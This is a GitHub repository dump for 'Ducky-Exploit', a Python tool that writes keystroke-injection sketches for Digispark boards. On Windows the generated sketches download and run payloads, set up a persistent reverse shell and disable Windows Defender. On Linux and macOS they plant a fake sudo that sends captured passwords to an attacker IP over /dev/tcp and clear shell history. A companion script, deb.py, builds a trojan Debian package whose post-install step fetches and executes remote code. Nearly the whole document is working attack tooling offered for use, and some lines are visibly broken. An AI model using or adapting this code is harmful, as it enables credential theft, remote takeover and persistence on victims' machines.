├── screenshot ├── Capture.JPG ├── screenshot.jpg ├── screenshot2.jpg └── screenshot3.jpg ├── README.md ├── LICENSE ├── deb.py └── ducky.py /screenshot/Capture.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/itsmehacker/Ducky-Exploit/HEAD/screenshot/Capture.JPG -------------------------------------------------------------------------------- /screenshot/screenshot.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/itsmehacker/Ducky-Exploit/HEAD/screenshot/screenshot.jpg -------------------------------------------------------------------------------- /screenshot/screenshot2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/itsmehacker/Ducky-Exploit/HEAD/screenshot/screenshot2.jpg -------------------------------------------------------------------------------- /screenshot/screenshot3.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/itsmehacker/Ducky-Exploit/HEAD/screenshot/screenshot3.jpg -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Ducky-Exploit 2 | # Introduction 3 | Ducky Exploit is python framework which helps as to code Digispark as Rubber Ducky 4 | 5 | 6 | This script has been tested on 7 | * **Kali Linux 18.2** 8 | * **Ubuntu 18.04** 9 | * **Windows** 10 | 11 | **Works with both Python2 and Python3** 12 | 13 | ## Keyboard Support Type 14 | US Type Keyboard 15 | 16 | 17 | ## Usage 18 | ```bash 19 | git clone https://github.com/itsmehacker5/Ducky-Exploit.git 20 | cd Ducky-Exploit/ 21 | python ducky.py 22 | ``` 23 | ## Screenshots 24 | ![example](https://github.com/itsmehacker/Ducky-Exploit/blob/master/screenshot/Capture.JPG) 25 | ![example](https://github.com/itsmehacker/Ducky-Exploit/blob/master/screenshot/screenshot.jpg) 26 | ![example](https://github.com/itsmehacker/Ducky-Exploit/blob/master/screenshot/screenshot2.jpg) 27 | ![example](https://github.com/itsmehacker/Ducky-Exploit/blob/master/screenshot/screenshot3.jpg) 28 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2019 Hacker Destination 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /deb.py: -------------------------------------------------------------------------------- 1 | import os,time 2 | import argparse,sys 3 | 4 | try: 5 | raw_input # Python 2 6 | except NameError: 7 | raw_input = input # Python 3 8 | 9 | #Colors 10 | R = '\033[31m' # red 11 | G = '\033[32m' # green 12 | C = '\033[36m' # cyan 13 | W = '\033[0m' #white 14 | 15 | def main(): 16 | global name 17 | global vers 18 | global arch 19 | global lhost 20 | name = raw_input(R + '[+]' + G + 'Enter of the name of the Deb file -> ' + W) 21 | vers = raw_input(R + '[+]' + G + 'Enter of the Version of the Deb file -> ' + W) 22 | lhost = raw_input(R + '[+]' + G + 'Enter of the Lhost -> ' + W) 23 | arch = raw_input(R + '[+]' + G + 'Enter of the Architecture of the Deb file (i386/amd64) -> ' + W) 24 | global h 25 | global j 26 | global we 27 | global uu 28 | h = str(name) 29 | j = str(name)+"_"+str(vers) 30 | we = str(lhost) 31 | uu = str(arch) 32 | with open(h, "w+") as r: 33 | payload = """ 34 | #!/bin/bash 35 | python -c "import urllib2; r = urllib2.urlopen('http://"""+str(lhost)+""":8080/SecPatch'); exec(r.read());" 36 | """ 37 | k = r.write(payload) 38 | o = open("postinst" , "a") 39 | m = """ 40 | #!/bin/bash 41 | chmod 2755 /usr/local/bin/"""+h+""" && /usr/local/bin/"""+h+""" & 42 | """ 43 | o.write(m) 44 | o.close() 45 | os.system("chmod 0755 postinst") 46 | print ("") 47 | print ("kimi finally done with it ;) happy injecting !!") 48 | print ("") 49 | 50 | #else: 51 | # print banner 52 | 53 | def make_deb(): 54 | gen = """ 55 | #!/bin/sh 56 | chmod u+x """+h+""" 57 | cat >> control << EOF 58 | Package: """+str(name)+""" 59 | Version: """+str(vers)+""" 60 | Section: Games and Amusement 61 | Priority: optional 62 | Architecture: """+uu+""" 63 | Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com) 64 | Description: MDPC kimi (SSA-RedTeam development 2017) 65 | EOF 66 | mkdir -p """+j+"""/usr/local/bin 67 | cp """+h+""" """+j+"""/usr/local/bin 68 | sleep 2 69 | mkdir -p """+j+"""/DEBIAN 70 | cp control """+j+"""/DEBIAN/control 71 | cp postinst """+j+"""/DEBIAN/postinst 72 | sleep 3 73 | dpkg-deb --build """+j+""" 74 | sleep 5 75 | rm -rf """+h+""" 76 | rm -rf control 77 | rm -rf postinst 78 | rm -rf """+j+""" 79 | rm -rf fro.sh 80 | """ 81 | er = open("fro.sh" , "w") 82 | er.write(gen) 83 | er.close() 84 | 85 | os.system("chmod +x fro.sh") 86 | os.system("./fro.sh") 87 | os.system("sudo chmod 777 *.deb") 88 | 89 | 90 | if __name__ == '__main__': 91 | main() 92 | make_deb() 93 | -------------------------------------------------------------------------------- /ducky.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # Importing Libary 4 | import os 5 | import platform 6 | import time 7 | import subprocess as subp 8 | import sys 9 | #Colors 10 | R = '\033[31m' # red 11 | G = '\033[32m' # green 12 | C = '\033[36m' # cyan 13 | W = '\033[0m' #white 14 | 15 | try: 16 | raw_input # Python 2 17 | except NameError: 18 | raw_input = input # Python 3 19 | 20 | if sys.platform == 'win32': 21 | os.system('cls') # Windows 22 | else: 23 | os.system('clear') # UNIX 24 | 25 | try: 26 | unicode # Python 2 27 | except NameError: 28 | unicode = str # Python 3 29 | 30 | #defining Banner 31 | def banner(): 32 | banner = """ 33 | ____ __ ______ __ _ __ 34 | / __ \__ _______/ /____ __ / ____/ ______ / /___ (_) /_ 35 | / / / / / / / ___/ //_/ / / / / __/ | |/_/ __ \/ / __ \/ / __/ 36 | / /_/ / /_/ / /__/ ,< / /_/ / / /____> ") 110 | f = open( "path" + name +".ino","w+") 111 | print 112 | print (R + 'Example -> Http://192.168.0.1/Payload.exe' + W) 113 | url = raw_input("[!] Enter URL with Payload Name -> ") 114 | x = 'DigiKeyboard.print("$client.DownloadFile(' + url 115 | time.sleep(2) 116 | f.write('#include "DigiKeyboard.h" \n') 117 | print 118 | f.write("void setup() { \n") 119 | f.write("} \n") 120 | print 121 | f.write("void loop() {\n") 122 | f.write("int d=1000;\n") 123 | f.write("DigiKeyboard.sendKeyStroke(0);\n") 124 | f.write("DigiKeyboard.delay(0);\n") 125 | f.write("DigiKeyboard.sendKeyStroke(0,MOD_GUI_LEFT);\n") 126 | f.write('DigiKeyboard.print("Windows Powershell");\n') 127 | f.write("DigiKeyboard.delay(2000);\n") 128 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 129 | f.write("DigiKeyboard.delay(1000);\n") 130 | f.write('DigiKeyboard.print("start powershell -verb runas;exit");\n') 131 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 132 | f.write("DigiKeyboard.delay(500);\n") 133 | f.write("DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);\n") 134 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 135 | f.write("DigiKeyboard.delay(400);\n") 136 | f.write('DigiKeyboard.print("$client = new-object System.Net.WebClient");\n') 137 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 138 | f.write("DigiKeyboard.delay(500);\n") 139 | f.write(x+''','Sys32Data.exe')");\n''') 140 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 141 | f.write('DigiKeyboard.print("start Sys32Data.exe");\n') 142 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 143 | f.write("DigiKeyboard.delay(1000);\n") 144 | f.write('DigiKeyboard.print("exit");\n') 145 | f.write("DigiKeyboard.delay(50);\n") 146 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 147 | f.write("DigiKeyboard.delay(50);\n") 148 | print 149 | f.close() 150 | time.sleep(2) 151 | print ("File has been Created Named ->"+name+"") 152 | 153 | elif choice == '2': 154 | os.system("cls") 155 | shell = """ 156 | Reverse Shell With Persistence 157 | """ 158 | name = raw_input("[!] Enter The File Name -> ") 159 | IP = raw_input("[!] Enter The Your IP -> ") 160 | PORT = raw_input("[!] Enter The Your Port -> ") 161 | f = open("path"+name+".ino","w+") 162 | f.write('#include "DigiKeyboard.h" \n') 163 | print 164 | f.write("void setup() { \n") 165 | f.write("} \n") 166 | print 167 | f.write("void loop() {\n") 168 | f.write("int d=1000;\n") 169 | f.write("DigiKeyboard.sendKeyStroke(0);\n") 170 | f.write("DigiKeyboard.delay(0);\n") 171 | f.write('DigiKeyboard.print("Windows Powershell");\n') 172 | f.write("DigiKeyboard.delay(2000);\n") 173 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 174 | f.write("DigiKeyboard.delay(1000);\n") 175 | f.write('DigiKeyboard.print("$client = new-object System.Net.WebClient");\n') 176 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 177 | f.write("DigiKeyboard.delay(500);\n") 178 | f.write('''DigiKeyboard.print("$client.DownloadFile('https://tinyurl.com/y88r9epk','Sys32Data.exe')");\n''') 179 | f.write('DigiKeyboard.print("cd / & mkdir System & cd System");\n') 180 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 181 | f.write("DigiKeyboard.delay(500);\n") 182 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 183 | f.write("DigiKeyboard.delay(500);\n") 184 | f.write("echo START /MIN Sys32Data.exe "+IP+" "+PORT+" -e cmd.exe -d ^& exit > start.bat") 185 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 186 | f.write('DigiKeyboard.print("start Sys32Data.exe");\n') 187 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 188 | f.write("DigiKeyboard.delay(1000);\n") 189 | f.write('DigiKeyboard.print("exit");\n') 190 | f.write("DigiKeyboard.delay(50);\n") 191 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 192 | f.write("DigiKeyboard.delay(50);\n") 193 | print 194 | f.close() 195 | 196 | elif choice == '3': 197 | os.system("cls") 198 | defenser = """ 199 | Disable Windows Defender 200 | """ 201 | print() 202 | name = raw_input("[!] Enter The File Name -> ") 203 | IP = raw_input("[!] Enter The Your IP -> ") 204 | PORT = raw_input("[!] Enter The Your Port -> ") 205 | f = open("path"+name+".ino","w+") 206 | f.write('#include "DigiKeyboard.h" \n') 207 | f.write("void setup() { \n") 208 | f.write("} \n") 209 | f.write("void loop() {\n") 210 | f.write("int d=1000;\n") 211 | f.write("DigiKeyboard.sendKeyStroke(0);\n") 212 | f.write("DigiKeyboard.delay(0);\n") 213 | f.write('DigiKeyboard.print("Windows Powershell");\n') 214 | f.write("DigiKeyboard.delay(2000);\n") 215 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 216 | f.write("DigiKeyboard.delay(1000);\n") 217 | f.write('DigiKeyboard.print("powershell Start-Process powershell -Verb runAs");\n') 218 | f.write("DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);\n") 219 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 220 | f.write("DigiKeyboard.delay(1000);\n") 221 | f.write("Set-MpPreference -DisableRealtimeMonitoring $true") 222 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 223 | f.write("exit") 224 | f.close() 225 | elif choice == '4': 226 | print('exit selected') 227 | exit() 228 | else: 229 | print("Wrong option selection. Enter any key to try again..") 230 | os.system('cls') 231 | print_menu() 232 | 233 | #function Linux 234 | def Linux(): 235 | os.system("cls") 236 | linux = """ 237 | /$$ /$$ 238 | | $$ |__/ 239 | | $$ /$$ /$$$$$$$ /$$ /$$ /$$ /$$ 240 | | $$ | $$ | $$__ $$ | $$ | $$ | $$ /$$/ 241 | | $$ | $$ | $$ \ $$ | $$ | $$ \ $$$$/ 242 | | $$ | $$ | $$ | $$ | $$ | $$ >$$ $$ 243 | | $$$$$$$$ | $$ | $$ | $$ | $$$$$$/ /$$/\ $$ 244 | |________/ |__/ |__/ |__/ \______/ |__/ \__/ 245 | """ 246 | print (C + linux + W) 247 | time.sleep(1) 248 | print (R + '[+]' + G + ' Choose the Attack' + W ) 249 | print (R + '[1]' + G + ' Sudo Password Grabber ' + W) 250 | print (R + '[2]' + G + ' Reverse Shell' + W) 251 | print (R + '[3]' + G + ' DEB Package With Persistence' + W) 252 | print (R + '[4]' + G + ' Exit' + W) 253 | choice = input("Enter your choice [1-4]: ") 254 | 255 | if choice == '1': 256 | os.system("cls") 257 | sudo = """ 258 | Sudo Password Grabber 259 | """ 260 | print (C + sudo + W) 261 | print ("") 262 | name = raw_input("[!] Enter The File Name -> ") 263 | IP = raw_input("[!] Enter The Your IP -> ") 264 | PORT = raw_input("[!] Enter The Your Port -> ") 265 | f = open("path"+name+".ino","w+") 266 | f.write('#include "DigiKeyboard.h" \n') 267 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER); \n") 268 | f.write("void setup() { \n") 269 | f.write("} \n") 270 | f.write("void loop() { \n ") 271 | f.write("DigiKeyboard.sendKeyStroke(0); \n") 272 | f.write("DigiKeyboard.sendKeyStroke(MOD_GUI_LEFT, KEY_SPACE); \n") 273 | f.write("DigiKeyboard.delay(500);\n") 274 | f.write('DigiKeyboard.print("Terminal"); \n') 275 | f.write("DigiKeyboard.delay(50);\n") 276 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 277 | f.write("DigiKeyboard.delay(100);\n") 278 | f.write('DigiKeyboard.print("mkdir -p ~/.config/sudo");\n') 279 | f.write("DigiKeyboard.delay(50); \n") 280 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 281 | f.write("DigiKeyboard.delay(100);\n") 282 | f.write('DigiKeyboard.print("rm ~/.config/sudo/sudo");\n') 283 | f.write("DigiKeyboard.delay(50);\n") 284 | f.write("DigiKeyboard.delay(100);\n") 285 | f.write('DigiKeyboard.print("echo "#!/bin/bash");\n') 286 | f.write("DigiKeyboard.delay(50);\n") 287 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 288 | f.write("DigiKeyboard.delay(100);\n") 289 | f.write('DigiKeyboard.print("/usr/bin/sudo -n true 2> dev/null");\n') 290 | f.write("DigiKeyboard.delay(50);\n") 291 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 292 | f.write("DigiKeyboard.delay(100);\n") 293 | f.write('DigiKeyboard.print("if [ $? -eq 0 ]");\n') 294 | f.write("DigiKeyboard.delay(50);\n") 295 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 296 | f.write("DigiKeyboard.delay(100);\n") 297 | f.write('DigiKeyboard.print("then");\n') 298 | f.write("DigiKeyboard.delay(50);\n") 299 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 300 | f.write("DigiKeyboard.delay(100);\n") 301 | f.write('DigiKeyboard.print("/usr/bin/sudo $@");\n') 302 | f.write("DigiKeyboard.delay(50);\n") 303 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 304 | f.write("DigiKeyboard.delay(100);\n") 305 | f.write('DigiKeyboard.print("else");\n') 306 | f.write("DigiKeyboard.delay(50);\n") 307 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 308 | f.write("DigiKeyboard.delay(100);\n") 309 | f.write('DigiKeyboard.print("echo -n "[sudo] password for $USER:")";\n') 310 | f.write("DigiKeyboard.delay(50);\n") 311 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 312 | f.write("DigiKeyboard.delay(100);\n") 313 | f.write('DigiKeyboard.print("read -s pwd");\n') 314 | f.write("DigiKeyboard.delay(50);\n") 315 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 316 | f.write("DigiKeyboard.delay(100);\n") 317 | f.write('DigiKeyboard.print("echo");\n') 318 | f.write("DigiKeyboard.delay(50);\n") 319 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 320 | f.write("DigiKeyboard.delay(100);\n") 321 | f.write('DigiKeyboard.print("echo "$pwd" | /usr/bin/share -S true 2>/dev/null");\n') 322 | f.write("DigiKeyboard.delay(50);\n") 323 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 324 | f.write("DigiKeyboard.delay(100);\n") 325 | f.write('DigiKeyboard.print("if [ $? -eq 1 ]");\n') 326 | f.write("DigiKeyboard.delay(50);\n") 327 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 328 | f.write("DigiKeyboard.delay(100);\n") 329 | f.write('DigiKeyboard.print("then");\n') 330 | f.write("DigiKeyboard.delay(50);\n") 331 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 332 | f.write("DigiKeyboard.delay(100);\n") 333 | f.write('DigiKeyboard.print("echo "$USER:$pwd:invalid" > /dev/tcp/' + IP + '/' + PORT + '");\n') 334 | f.write("DigiKeyboard.delay(50);\n") 335 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 336 | f.write("DigiKeyboard.delay(100);\n") 337 | f.write('DigiKeyboard.print("echo Sorry, try again.");\n') 338 | f.write("DigiKeyboard.delay(50);\n") 339 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 340 | f.write("DigiKeyboard.delay(100);\n") 341 | f.write('DigiKeyboard.print("sudo $@");\n') 342 | f.write("DigiKeyboard.delay(50);\n") 343 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 344 | f.write("DigiKeyboard.delay(100);\n") 345 | f.write('DigiKeyboard.print("else");\n') 346 | f.write("DigiKeyboard.delay(50);\n") 347 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 348 | f.write("DigiKeyboard.delay(100);\n") 349 | f.write('DigiKeyboard.print("echo "$USER:$pwd:valid" > /dev/tcp/' + IP + '/1337 ");\n') 350 | f.write("DigiKeyboard.delay(50);\n") 351 | f.write("DigiKeyboard.sendKeyStro)ke(KEY_ENTER);\n") 352 | f.write("DigiKeyboard.delay(100);\n") 353 | f.write('DigiKeyboard.print("echo "$pwd" | /usr/bin/sudo -S $@ ");\n') 354 | f.write("DigiKeyboard.delay(50);\n") 355 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 356 | f.write("DigiKeyboard.delay(100);\n") 357 | f.write('DigiKeyboard.print("fi");\n') 358 | f.write("DigiKeyboard.delay(50);\n") 359 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 360 | f.write("DigiKeyboard.delay(100);\n") 361 | f.write('DigiKeyboard.print("fi > ~/.config/sudo/sudo");\n') 362 | f.write("DigiKeyboard.delay(50);\n") 363 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 364 | f.write("DigiKeyboard.delay(100);\n") 365 | f.write('DigiKeyboard.print("chmod u+x ~/.config/sudo/sudo");\n') 366 | f.write("DigiKeyboard.delay(50);\n") 367 | f.write("DigiKeyboard.sendKeyStrso)ke(KEY_ENTER);\n") 368 | f.write("DigiKeyboard.delay(100);\n") 369 | f.write('DigiKeyboard.print("echo "export PATH=~/.config/sudo:$PATH" >> ~/.bash_profile");\n') 370 | f.write("DigiKeyboard.delay(50);\n") 371 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 372 | f.write("DigiKeyboard.delay(100);\n") 373 | f.write('DigiKeyboard.print("echo "export PATH=~/.config/sudo:$PATH" >> ~/.bashrc");\n') 374 | f.write("DigiKeyboard.delay(50);\n") 375 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 376 | f.write("DigiKeyboard.delay(100);\n") 377 | f.write('DigiKeyboard.print("history -c && rm .bash_history && exit");\n') 378 | f.write("DigiKeyboard.delay(50);)\n") 379 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 380 | f.write("DigiKeyboard.delay(100);\n") 381 | f.write('DigiKeyboard.print("MOD_GUI_LEFT, KEY_Q");\n ') 382 | f.write("DigiKeyboard.delay(50);\n") 383 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 384 | f.write("} \n") 385 | f.close() 386 | time.sleep(1) 387 | print ('File Created -> '+name+'') 388 | print_menu() 389 | 390 | elif choice == '2': 391 | os.system("cls") 392 | sudo = """ 393 | Reverse Shell 394 | """ 395 | print ("") 396 | name = raw_input("[!] Enter The File Name -> ") 397 | url = raw_input("[!] Enter URL -> ") 398 | pname = raw_input("Payload Name -> ") 399 | f = open("path"+name+".ino","w+") 400 | f.write('#include "DigiKeyboard.h" \n') 401 | f.write("void setup() { \n") 402 | f.write("} \n") 403 | f.write("void loop() {\n") 404 | f.write("DigiKeyboard.delay(200);\n") 405 | f.write("DigiKeyboard.sendKeyStroke(KEY_T, MOD_CONTROL_LEFT | MOD_ALT_LEFT);\n") 406 | f.write("DigiKeyboard.delay(2000);\n") 407 | f.write('DigiKeyboard.print("wget http://'+url+'/'+pname+'.py");\n') 408 | f.write("DigiKeyboard.delay(500);\n") 409 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 410 | f.write('DigiKeyboard.print("python '+ panme +'.py");\n') 411 | f.write("DigiKeyboard.delay(500);\n") 412 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 413 | f.write("DigiKeyboard.delay(500);\n") 414 | f.write('DigiKeyboard.print("exit");\n') 415 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 416 | f.write("}\n") 417 | f.close() 418 | time.sleep(1) 419 | print ('File Created -> '+name+'') 420 | print_menu() 421 | elif choice == '3': 422 | os.system("cls") 423 | DEB = """ 424 | DEB Package with Persistence 425 | """ 426 | print (C + DEB + W) 427 | print 428 | os.system("python deb.py") 429 | print ('\n' + G + '[!]' + C + ' Starting Apache Server...' + W) 430 | subp.check_output(['service', 'apache2', 'start']) 431 | name = raw_input("[+] Enter Name of the Package -> ") 432 | os.system("mv "+name+" /var/www/html/"+ name +"") 433 | print ('\n' + G + '[!]' + C + ' Moving File to apache2 folder' + W) 434 | elif choice == '4': 435 | exit() 436 | 437 | #function Mac OS 438 | def Mac(): 439 | os.system("cls") 440 | mac = """ 441 | /$$ /$$ /$$$$$$ /$$$$$$ 442 | | $$$ /$$$ /$$__ $$ /$$__ $$ 443 | | $$$$ /$$$$ /$$$$$$ /$$$$$$$ | $$ \ $$ | $$ \__/ /$$ /$$ 444 | | $$ $$/$$ $$ |____ $$ /$$_____/ | $$ | $$ | $$$$$$ | $$ /$$/ 445 | | $$ $$$| $$ /$$$$$$$ | $$ | $$ | $$ \____ $$ \ $$$$/ 446 | | $$\ $ | $$ /$$__ $$ | $$ | $$ | $$ /$$ \ $$ >$$ $$ 447 | | $$ \/ | $$ | $$$$$$$ | $$$$$$$ | $$$$$$/ | $$$$$$/ /$$/\ $$ 448 | |__/ |__/ \_______/ \_______/ \______/ \______/ |__/ \__/ 449 | """ 450 | print (C + mac + W) 451 | time.sleep(2) 452 | print 453 | print 454 | print (R + '[+]' + G + ' Choose the Attack' + W) 455 | print (R + '[1]' + G + ' Sudo Password Grabber' + W ) 456 | print (R + '[2]' + G + ' Reverse Shell' + W) 457 | print (R + '[3]' + G + ' Exit' + W) 458 | choice = input("Enter your choice [1-4]: ") 459 | 460 | if choice == '1': 461 | os.system("cls") 462 | sudo = """ 463 | Sudo Password Grabber 464 | """ 465 | print (C + sudo + W) 466 | print ("") 467 | name = raw_input("[!] Enter The File Name -> ") 468 | IP = raw_input("[!] Enter The Your IP -> ") 469 | PORT = raw_input("[!] Enter The Your Port -> ") 470 | f = open("path"+name+".ino","w+") 471 | f.write('#include "DigiKeyboard.h" \n') 472 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER); \n") 473 | f.write("void setup() { \n") 474 | f.write("} \n") 475 | f.write("void loop() { \n ") 476 | f.write("DigiKeyboard.sendKeyStroke(0); \n") 477 | f.write("DigiKeyboard.sendKeyStroke(MOD_GUI_LEFT, KEY_SPACE); \n") 478 | f.write("DigiKeyboard.delay(500);\n") 479 | f.write('DigiKeyboard.print("Terminal"); \n') 480 | f.write("DigiKeyboard.delay(50);\n") 481 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 482 | f.write("DigiKeyboard.delay(100);\n") 483 | f.write('DigiKeyboard.print("mkdir -p ~/.config/sudo");\n') 484 | f.write("DigiKeyboard.delay(50); \n") 485 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 486 | f.write("DigiKeyboard.delay(100);\n") 487 | f.write('DigiKeyboard.print("rm ~/.config/sudo/sudo");\n') 488 | f.write("DigiKeyboard.delay(50);\n") 489 | f.write("DigiKeyboard.delay(100);\n") 490 | f.write('DigiKeyboard.print("echo "#!/bin/bash");\n') 491 | f.write("DigiKeyboard.delay(50);\n") 492 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 493 | f.write("DigiKeyboard.delay(100);\n") 494 | f.write('DigiKeyboard.print("/usr/bin/sudo -n true 2> dev/null");\n') 495 | f.write("DigiKeyboard.delay(50);\n") 496 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 497 | f.write("DigiKeyboard.delay(100);\n") 498 | f.write('DigiKeyboard.print("if [ $? -eq 0 ]");\n') 499 | f.write("DigiKeyboard.delay(50);\n") 500 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 501 | f.write("DigiKeyboard.delay(100);\n") 502 | f.write('DigiKeyboard.print("then");\n') 503 | f.write("DigiKeyboard.delay(50);\n") 504 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 505 | f.write("DigiKeyboard.delay(100);\n") 506 | f.write('DigiKeyboard.print("/usr/bin/sudo $@");\n') 507 | f.write("DigiKeyboard.delay(50);\n") 508 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 509 | f.write("DigiKeyboard.delay(100);\n") 510 | f.write('DigiKeyboard.print("else");\n') 511 | f.write("DigiKeyboard.delay(50);\n") 512 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 513 | f.write("DigiKeyboard.delay(100);\n") 514 | f.write('DigiKeyboard.print("echo -n "[sudo] password for $USER:")";\n') 515 | f.write("DigiKeyboard.delay(50);\n") 516 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 517 | f.write("DigiKeyboard.delay(100);\n") 518 | f.write('DigiKeyboard.print("read -s pwd");\n') 519 | f.write("DigiKeyboard.delay(50);\n") 520 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 521 | f.write("DigiKeyboard.delay(100);\n") 522 | f.write('DigiKeyboard.print("echo");\n') 523 | f.write("DigiKeyboard.delay(50);\n") 524 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 525 | f.write("DigiKeyboard.delay(100);\n") 526 | f.write('DigiKeyboard.print("echo "$pwd" | /usr/bin/share -S true 2>/dev/null");\n') 527 | f.write("DigiKeyboard.delay(50);\n") 528 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 529 | f.write("DigiKeyboard.delay(100);\n") 530 | f.write('DigiKeyboard.print("if [ $? -eq 1 ]");\n') 531 | f.write("DigiKeyboard.delay(50);\n") 532 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 533 | f.write("DigiKeyboard.delay(100);\n") 534 | f.write('DigiKeyboard.print("then");\n') 535 | f.write("DigiKeyboard.delay(50);\n") 536 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 537 | f.write("DigiKeyboard.delay(100);\n") 538 | f.write('DigiKeyboard.print("echo "$USER:$pwd:invalid" > /dev/tcp/' + IP + '/' + PORT + '");\n') 539 | f.write("DigiKeyboard.delay(50);\n") 540 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 541 | f.write("DigiKeyboard.delay(100);\n") 542 | f.write('DigiKeyboard.print("echo Sorry, try again.");\n') 543 | f.write("DigiKeyboard.delay(50);\n") 544 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 545 | f.write("DigiKeyboard.delay(100);\n") 546 | f.write('DigiKeyboard.print("sudo $@");\n') 547 | f.write("DigiKeyboard.delay(50);\n") 548 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 549 | f.write("DigiKeyboard.delay(100);\n") 550 | f.write('DigiKeyboard.print("else");\n') 551 | f.write("DigiKeyboard.delay(50);\n") 552 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 553 | f.write("DigiKeyboard.delay(100);\n") 554 | f.write('DigiKeyboard.print("echo "$USER:$pwd:valid" 